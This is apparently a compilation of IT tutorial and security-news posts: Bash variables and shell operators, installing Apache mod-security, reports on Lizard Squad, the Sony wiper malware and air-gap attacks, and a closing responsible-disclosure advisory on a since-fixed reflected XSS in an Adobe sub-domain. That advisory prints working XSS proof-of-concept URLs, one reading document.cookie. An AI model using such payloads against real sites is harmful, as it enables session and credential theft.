BASHOPTS=checkwinsize:cmdhist:expand_aliases:extquote:force_fignore:histappend:hostcomplete:interactive_comments:login_shell:progcomp:promptvars:sourcepath BASH_ALIASES=() BASH_SOURCE=() BASH_VERSINFO=([0]="4" [1]="1" [2]="5" [3]="1" [4]="release" [5]="i486-pc-linux-gnu") BASH_VERSION='4.1.5(1)-release' COLUMNS=80 DIRSTACK=() EUID=0 GROUPS=() HISTCONTROL=ignoreboth HISTFILE=/root/.bash_history HISTFILESIZE=500 HISTSIZE=500 HOME=/root HOSTNAME=ittutorials HOSTTYPE=i486 IFS=$' \t\n' LINES=24 LOGNAME=root ... LinuxBox# To set environment variable in Bourne shell (sh and bash), simply use "export" command with the name and value of environment variable (export var=value): LinuxBox# export PATH=/home/JohnnyBoy/bin LinuxBox# Or, to add a folder in the current PATH without overwriting the current path: LinuxBox# export PATH=$PATH:/home/JohnnyBoy/bin LinuxBox# (Changing env variable like PATH will enable You to run script located in the folder You have just added to the path, without providing the full path of the script. After the change, scripts will be able to run from anywhere in the system path by simply calling the name of the script.) Reading user's input Non-interactive scripts are useful, but we have to provide new information from the start when the script gets iniciated. Better way is to make interactive script that can catch user's input as script's arguments while the script is running. Catching user's input is usualy done from the command line interface during script's run-time. To read user input and put the value in variable of a script, we'll use "read" syntax: LinuxBox# vi my_script.sh #!/bin/bash # Reading of user's input echo "Please enter your name: " read user_name echo "Nice to meet you $user_name" echo "Can you please enter Your 2 favorite colors? " read color1 color2 echo "Your favorite colors are $colo1 and $color2." LinuxBox# ./my_script.sh Please enter your name: John Nice to meet you John Can you please enter Your 2 favorite colors? Black White Your favorite colors are Black and White. LinuxBox# Or we could simply use "$" sign with the number of argument we want to catch. So if we would like to catch 1st argument we can use $1 as in example below: LinuxBox# vi my_script.sh #!/bin/bash # Reading and displaying of arguments echo "You just entered the words: $1 $2" LinuxBox# ./my_script.sh John Malkovich You just entered the words: John Malkovich LinuxBox# (Notice that catching data this way doesn't wait users input. We have to provide input along with the script name, as in the example above, where input is "Jonh Malkovich".) Source

In computer programing, an operator is a symbol or function representing a mathematical operation. Common examples are mathematical arithmetic operations, e.g. ">" for "greater than", or "<" for "les than". Programming languages typically support a set of built-in operators (e.g. +, -, *). As in programing languages, there are various operators supported by each unix shell. Bourne Shell operators: Arithmetic Operators Relational Operators Boolean Operators String Operators File Test Operators LinuxBox#vi my_script.sh #!/bin/sh # summation of 2 numbers val=`expr 3 + 2` echo "Total value: $val !" LinuxBox# LinuxBox# ./my_script.sh Total value: 5 ! One thing to notice is that Bourne shell originally didn't have any mechanism to perform simple arithmetic but it uses external programs. Common example of performing arithmetic is done by using simple "expr" program. Simple example of summation of two numbers: Also notice that there must be spaces between operators and expressions - for example "2+2" is not correct, where as it should be written as "2 + 2". Also, completed expression should be enclosed between `` signs, called inverted commas.) Arithmetic Operators: + Addition - Adds values on either side of the operator - Subtraction - Subtracts right hand operand from left hand operand * Multiplication - Multiplies values on either side of the operator / Division - Divides left hand operand by right hand operand % Modulus - Divides left hand operand by right hand operand and returns remainder = Assignment - Assign right operand in left operand == Equality - Compares two numbers, if both are same then returns true != Not Equality - Compares two numbers, if both are different then returns true Important thing to note here is that all the conditional expressions should be put inside square braces with one spaces around them. For example [ $a == $b ] is correct where as [$a==$b] is incorrect. Relational Operators: Relational operators are specific to numeric values. These operators would not work for string values unless their value is numeric. For example, operators would work to check a relation between 5 and 10 as well as in between "5" and "10" but not in between "five" and "ten". -eq - Checks if the value of two operands are equal or not -ne - Checks if the value of two operands are not equal -gt - Checks if the value of left operand is greater than the value of right operand -lt - Checks if the value of left operand is less than the value of right operand -ge - Checks if the value of left operand is greater than or equal to the value of right operand -le - Checks if the value of left operand is less than or equal to the value of right operand Important thing to note here is that all the conditional expressions should be put inside square braces with one spaces around them, For example [ $A <= $A ] is correct where as [$A <= $B] is not correct. Boolean Operators Boolean algebra is the subarea of algebra in which the values of the variables are the truth values true and false. For example, boolean operator for logical negation "!" could be combined with Relational Operator which checks equalty, which would in the end make them to check for "NOT equality". ! - This is logical negation. This inverts a true condition into false and vice versa -o - This is logical OR. If one of the operands is true then condition would be true -a - This is logical AND. If both the operands are true then condition would be true otherwise it would be false String Operators String operators are operators intended for use with variables that hold string vaules. = Checks if the value of two operands are equal or not, if yes then condition becomes true != Checks if the value of two operands are equal or not, if values are not equal then condition becomes true -z Checks if the given string operand size is zero. If it is zero length then it returns true -n Checks if the given string operand size is non-zero. If it is non-zero length then it returns true str Check if str is not the empty string. If it is empty then it returns false File Test Operators File Test Operators are operators to test various properties associated with a Unix files. It is assumed that variable "file" holds an file name (full path to specific file). -b file Checks if file is a block special file if yes then condition becomes true -c file Checks if file is a character special file if yes then condition becomes true -d file Check if file is a directory if yes then condition becomes true -f file Check if file is an ordinary file as opposed to a directory or special file if yes then condition becomes true -g file Checks if file has its set group ID (SGID) bit set if yes then condition becomes true -k file Checks if file has its sticky bit set if yes then condition becomes true -p file Checks if file is a named pipe if yes then condition becomes true -t file Checks if file descriptor is open and associated with a terminal if yes then condition becomes true -u file Checks if file has its set user id (SUID) bit set if yes then condition becomes true -r file Checks if file is readable if yes then condition becomes true -w file Check if file is writable if yes then condition becomes true -x file Check if file is execute if yes then condition becomes true -s file Check if file has size greater than 0 if yes then condition becomes true -e file Check if file exists. Is true even if file is a directory but exists Next, see Shell scripting tutorial and examples of usage of shell operators. Source

ModSecurity ModSecurity is an Open Source Web Application project (Apache module) that aims to secure web applications running on webservers and block penetration or hacking attempts investigating in the body of http requests. It provides intrusion detection and prevention for web applications and aims at shielding web applications from attacks like SQL injections, cross-site scripting and path traversal attacks ... About Apache modules The Apache WebServer is a modular application where the user can choose the functionality to include in the server by selecting desired modules. Modules can be either statically compiled into the httpd binary when the server is built or compiled as Dynamic Shared Objects (DSOs) separately from the main httpd binary file. DSO modules may be compiled at the time the server is built, or they may be compiled and added at a later time using the Apache Extension Tool (apxs). After a module is compiled into a DSO, it will have an extension like mod.so. Installing mod-security Mod-security can be installed with apt-get manager on Debian, or on Fedora system Yum can be used. First, we'll update apt-get source database: LinuxBox# apt-get update Ign http://ftp.de.debian.org lenny Release.gpg Ign http://ftp.de.debian.org/debian/ lenny/main Translation-en Hit http://security.debian.org squeeze/updates Release.gpg Ign http://security.debian.org/ squeeze/updates/contrib Translation-en Ign http://security.debian.org/ squeeze/updates/contrib Translation-en_US Ign http://ftp.de.debian.org/debian/ lenny/main Translation-en_US Hit http://ftp.de.debian.org squeeze Release.gpg Ign http://ftp.de.debian.org/debian/ squeeze/main Translation-en Ign http://ftp.de.debian.org/debian/ squeeze/main Translation-en_US Ign http://ftp.de.debian.org lenny Release Ign http://security.debian.org/ squeeze/updates/main Translation-en Ign http://security.debian.org/ squeeze/updates/main Translation-en_US Hit http://security.debian.org squeeze/updates Release Hit http://ftp.de.debian.org squeeze Release ... .. . After updating source list, we can install mod-security: LinuxBox# apt-get install libapache-mod-security Reading package lists... Done Building dependency tree Reading state information... Done The following extra packages will be installed: liblua5.1-0 mod-security-common The following NEW packages will be installed: libapache-mod-security liblua5.1-0 mod-security-common 0 upgraded, 3 newly installed, 0 to remove and 73 not upgraded. Need to get 1,158 kB of archives. After this operation, 3,490 kB of additional disk space will be used. Do you want to continue [Y/n]? ... .. . Setting up libapache-mod-security (2.5.12-1) ... Reloading web server config: apache2. In /etc/apache2/mods-available/ we can find available apache modules and mod-security: LinuxBox# ls /etc/apache2/mods-available/ | grep mod mod-security.load LinuxBox# (In /etc/apache2/mods-enbled are located symlinks on modules which are enabled) Enabling or disabling Apache modules Once apache module is installed we can enable it with a2dismod, or disable it with a2dismod command, after which we have to restart the Apache server with "/etc/init.d/apache2 restart" command: LinuxBox# a2dismod mod-security && /etc/init.d/apache2 restart Module mod-security disabled. Run '/etc/init.d/apache2 restart' to activate new configuration! Restarting web server: apache2 ... waiting . LinuxBox# a2enmod mod-security && /etc/init.d/apache2 restart Enabling module mod-security. Run '/etc/init.d/apache2 restart' to activate new configuration! Restarting web server: apache2 ... waiting . Check loaded modules To check and see loaded modules, modules which are enabled, apachectl -M can be used: LinuxBox# apachectl -M Loaded Modules: core_module (static) log_config_module (static) logio_module (static) mpm_prefork_module (static) http_module (static) so_module (static) alias_module (shared) auth_basic_module (shared) authn_file_module (shared) authz_default_module (shared) authz_groupfile_module (shared) authz_host_module (shared) authz_user_module (shared) autoindex_module (shared) cgi_module (shared) deflate_module (shared) dir_module (shared) env_module (shared) mime_module (shared) security2_module (shared) negotiation_module (shared) perl_module (shared) php5_module (shared) python_module (shared) reqtimeout_module (shared) setenvif_module (shared) status_module (shared) unique_id_module (shared) Syntax OK LinuxBox# Source

A hacker group has claimed responsibility for attacking Sony's online PlayStation store, which is down on Monday. Visitors to the site are greeted with a message that says "Page Not Found! It's not you. It's the internet's fault". A group called "Lizard Squad" has taken credit for the outage, posting "PSN Login #offline #LizardSquad" as their Twitter status. The outage is the most recent in a series of attacks on tech giant Sony. The Japanese firm's Hollywood film studios' corporate network was hacked into last month, followed by an online leak of unreleased movies, along with confidential information such as actors' salaries. Sony Entertainment Network has responded by tweeting that they are aware of the issues that users are having in connecting to the PlayStation network. "Thanks for your patience as we investigate," the company tweeted at about midnight GMT. The disruption comes just days after the gaming console celebrated its 20th anniversary last week. Lizard Squad attacks Meanwhile, the outage on the PlayStation network follows one on Microsoft Xbox network, which was down for at least a day last week. Lizard Squad also claimed it was behind the attack. The Xbox network was hit with a DDOS, or a distributed denial of service attack, which overloaded the system, stopping users from getting online. The hacker group had then said that its Xbox attack was just "a small dose" of what was to come over the Christmas season. Lizard Squad has claimed responsibility for attacks that have taken high-profile targets like EA games and Destiny offline in the past. Known as Lizard Patrol on Twitter, the anonymous collective has a Russian-based website. Source

One of the 1.3 million names sent into space aboard NASA's Orion test capsule was a stowaway, uploaded to NASA's database by a security researcher who found and exploited a vulnerability. The name 'Payload1 Payload2' was one of three uploaded to the NASA Orion database that collected names to be later transferred to a chip aboard the rocket and shot into space. The hack since closed was not malicious nor dangerous to the mission but rather a flexing of grey matter by bug hunter Benjamin Kunz Mejri. "Two IDs were observed by the NASA team and one passed through the procedure of verification and validation," Mejri wrote in an advisory. "To ensure the ticket was closed NASA included an image that shows the user in the official NASA 'no fly list'. "The high severity vulnerability allows remote attackers to inject own system specific codes to the application-side of the affected NASA online-service website." The filter bypass and persistent input validation web vulnerability was related to the first and surname fields of the Orion boarding pass module. It let remote attackers to inject scripts to compromise NASA's embed boarding pass module. "After saving the malicious context to a boarding pass service the attacker can use the embed module to stream malicious codes as embed code execution through the boarding pass application of the NASA Mars program website," he said. Mejri reported the flaw and his exploits to NASA which promptly banned two of the three identities uploaded, allegedly missing one. The two known identities were stamped with a 'no fly list' while the third remains known only to Mertz. Names were written to a chip using e-beam lithography and subsequently flashed to a second chip which went into space. NASA said the chip was not vulnerable since it was isolated and lacked executable code. The ship landed safely in the Pacific Ocean Saturday a mile and a half off-target. Mejri's payload spent four hours and 24 minutes in two elliptical orbits of Earth, with an apogee of 5800 kilometres. Source

Kaspersky bod Kurt Baumgartner has released more details on the Sony-plundering malware and links it to attacks on Saudi Aramco and South Korea. Research conducted in the wake of the epic Sony breach last month had connected those behind the attack known as the Guardians of Peace (GOP) with the 2012 hacking of Saudi Aramco by 'WhoIs Team' that hit 30,000 computers with the Shamoon malware at a time when tensions were high between Saudi Arabia and Iran. The malware served to Sony disabled or destroyed corporate machines forcing the firm to enter an IT lock-down. It was dubbed BKDR_WIPALL by Trend Micro and Destover by Kaspersky. Baumgartner's work added further weight to claims the malware used in both attacks and the 2013 Dark Seoul hacks were deployed by the same actors. "In all three cases: Shamoon, Dark Seoul and Destover, the groups claiming credit for their destructive impact across entire large networks had no history or real identity of their own," Baumgartner (@k_sec) wrote in an analysis piece. "All attempted to disappear following their act, did not make clear statements but did make bizarre and roundabout accusations of criminal conduct, and instigated their destructive acts immediately after a politically-charged event that was suggested as having been at the heart of the matter. "Images from the Dark Seoul Whois and Destover GOP groups included a 'hacked by' claim, accompanied by a 'warning' and threats regarding stolen data. Both threatened that this was only the beginning and that the group will be back." A further point linking the Sony and South Korea attacks was in the styling of the defacements used, which used skulls and the same colours. The GOP bore a group name with a similar cheesy 90 hacker phonetic structure to the Saudi Aramco culprits known as the 'Cutting Sword of Justice'. There were technological similarities too. Shamoon and Wiper used off-the-shelf EldoS RawDisk drivers maintained in the dropper's resource section, while Shamoon and Dark Seoul dropped political messages to overwrite disk data and the master boot record. The hackers worked to a tight deadline in the Dark Seoul and Sony attacks compiling executables two days before attack. Shamoon components were similarly rushed having been built five days from d-day. The commonalities were no smoking gun pointing to North Korea, but the links between the attack campaigns was "extraordinary" given the high profile nature of the victims, Baumgartner said. "... it should be noted that the reactionary events and the groups' operational and tool set characteristics all carry marked similarities [and] it is extraordinary that such unusual and focused acts of large scale cyber-destruction are being carried out with clearly recognisable similarities," he said. Sony would be likely able to recover its wiped data if the malware was close-enough to that used in Shamoon and Dark Seoul, Baumgartner said. Source

How do you remotely hack a computer that is not connected to the internet? Most of the time you can’t, which is why so-called air-gapped computers are considered more secure than others. An air-gapped computer is one that is neither connected to the internet nor connected to other systems that are connected to the internet. Air gaps generally are implemented where the system or network requires extra security, such as classified military networks, the payment networks that process credit and debit card transactions for retailers, or industrial control systems that operate critical infrastructure. To maintain security, payment and industrial control systems should only be on internal networks that are not connected to the company’s business network, thus preventing intruders from entering the corporate network through the internet and working their way to sensitive systems. A true air gap means the machine or network is physically isolated from the internet, and data can only pass to it via a USB flash drive, other removable media, or a firewire connecting two computers directly. But many companies insist that a network or system is sufficiently air-gapped even if it is only separated from other computers or networks by a software firewall. Such firewalls, however, can be breached if the code has security holes or if the firewalls are configured insecurely. Although air-gapped systems were believed to be more secure in the past, since they required an attacker to have physical access to breach them, recent attacks involving malware that spread via infected USB flash drives have shown the lie to this belief. One of the most famous cases involving the infection of an air-gapped system is Stuxnet, the virus/worm designed to sabotage centrifuges used at a uranium enrichment plant in Iran. Computer systems controlling the centrifuges were air-gapped, so the attackers designed Stuxnet to spread surreptitiously via USB flash drives. Outside contractors responsible for programming the systems in Iran were infected first and then became unwitting carriers for the malware when they brought their laptops into the plant and transferred data to the air-gapped systems with a flash drive. More recently, evidence has shown that air-gapped systems can also be attacked through radio waves. Researchers in Israel showed how they could siphon data from an air-gapped machine using radio frequency signals and a nearby mobile phone. The proof-of-concept hack involves radio signals generated and transmitted by an infected machine’s video card, which are used to send passwords and other data over the air to the FM radio receiver in a mobile phone. The method is more than just a concept, however, to the NSA. The spy agency has reportedly been using a more sophisticated version of this technique for years to siphon data from air-gapped machines in Iran and elsewhere. Using an NSA hardware implant called the Cottonmouth-I, which comes with a tiny embedded transceiver, the spy agency can extract data from targeted systems via RF signals and transmit it to a briefcase-sized NSA relay station up to eight miles away. That’s a pretty large air gap to jump. This, and the use of attacks via USB flash drives, effectively mean that no air-gapped system is beyond the reach of attackers. Source

###################################################################### # Exploit Title: Adobe.com Flashplayer sub-domain Reflected XSS (RXSS) # Date: 08/12/2014 # Author: Yann CAM @ Synetis - ASafety # Vendor or Software Link: www.adobe.com # Version: / # Category: Reflected Cross Site Scripting # Google dork: # Tested on: Adobe.com Flashplayer sub-domain ###################################################################### Adobe description : ====================================================================== Adobe Systems Incorporated is a multinational computer software company. Adobe Systems headquarter is based in San Jose, California, United States. The company has historically focused upon the creation of multimedia and creativity software products, with a more-recent foray towards rich Internet application software development. It is best known for the Portable Document Format (PDF), Flash player and Adobe Creative Suite, later Adobe Creative Cloud. Vulnerability description : ====================================================================== A reflected XSS is available in the get3.adobe.com sub-domain. Through this vulnerability, an attacker could tamper with page rendering, redirect victims to fake Adobe portals, or capture Adobe's users credentials such cookies. It's also possible to forge a fake adobe's page with this XSS to provide a backdoored version of the flash plugin to users. This reflected XSS is on GET "re" variable and is not properly sanitized before being used to his page. Proof of Concept 1 : ====================================================================== A non-persistent XSS (RXSS) in "re" GET param is available in the get3.adobe.com sub-domain. Tested on Firefox 31.0. After upgrading Flashplayer with auto-update agent on Windows, a page of adobe sub-domain is automatically opened. This page is opened to check if the upgrade is successfully ; and return code of the auto-update agent is passed through "re" GET variable. This numeric return code is reinjected into the JavaScript source-code of the page and can be crafted to make an XSS. PoC: https://get3.adobe.com/fr/flashplayer/completion/aih/?exitcode=1337&re=7331;alert(/Reflected XSS - Yann CAM @asafety - [url]www.synetis.com/);&type=update&appid=200[/url] Proof of Concept 2 : ====================================================================== Session cookie can be retrive with this XSS. PoC: [url]https://get3.adobe.com/fr/flashplayer/completion/aih/?exitcode=1337&re=7331;alert(document.cookie);&type=update&appid=200[/url] Screenshots : ====================================================================== - [url]http://www.asafety.fr/data/20140829-adobe-xss01.png[/url] - [url]http://www.asafety.fr/data/20140829-adobe-xss02.png[/url] - [url]http://www.asafety.fr/data/20140829-adobe-xss04.png[/url] Solution: ====================================================================== Fixed by Adobe PSIRT. Additional resources : ====================================================================== - [url]https://www.adobe.com/[/url] - [url]https://blogs.adobe.com/psirt/[/url] - [url]https://helpx.adobe.com/security/acknowledgements.html[/url] - [url]http://www.asafety.fr/actualites-news/contribution-adobe-injection-de-code-javascript-xss/[/url] - [url]http://www.synetis.com[/url] Report timeline : ====================================================================== 2014-08-28 : Adobe PSIRT Team alerted with details and PoC. 2014-08-30 : Adobe response and issue number affected (2985). 2014-10-28 : Vulnerability not fixed, second email to get a status. 2014-10-28 : Adobe response : still working on this issue. 2014-12-05 : Vulnerability seems to be fixed, third email to get a status. 2014-12-05 : Adobe response : case 2985 closed and acknowledgement. 2014-12-08 : Public advisory Credits : ====================================================================== 88888888 88 888 88 88 888 88 88 788 Z88 88 88.888888 8888888 888888 88 8888888. 888888. 88 88 888 Z88 88 88 88 88 88 88 8888888 88 88 88 88 88 88 88 88 888 888 88 88 88 88 88888888888 88 88 888888 88 88 88 8. 88 88 88 88 88 888 888 ,88 8I88 88 88 88 88 88 88 .88 .88 ?8888888888. 888 88 88 88888888 8888 88 =88888888 888. 88 88 [url]www.synetis.com[/url] 8888 Consulting firm in management and information security Yann CAM - Security Consultant @ Synetis | ASafety -- SYNETIS | ASafety CONTACT: [url]www.synetis.com[/url] | [url]www.asafety.fr[/url] Source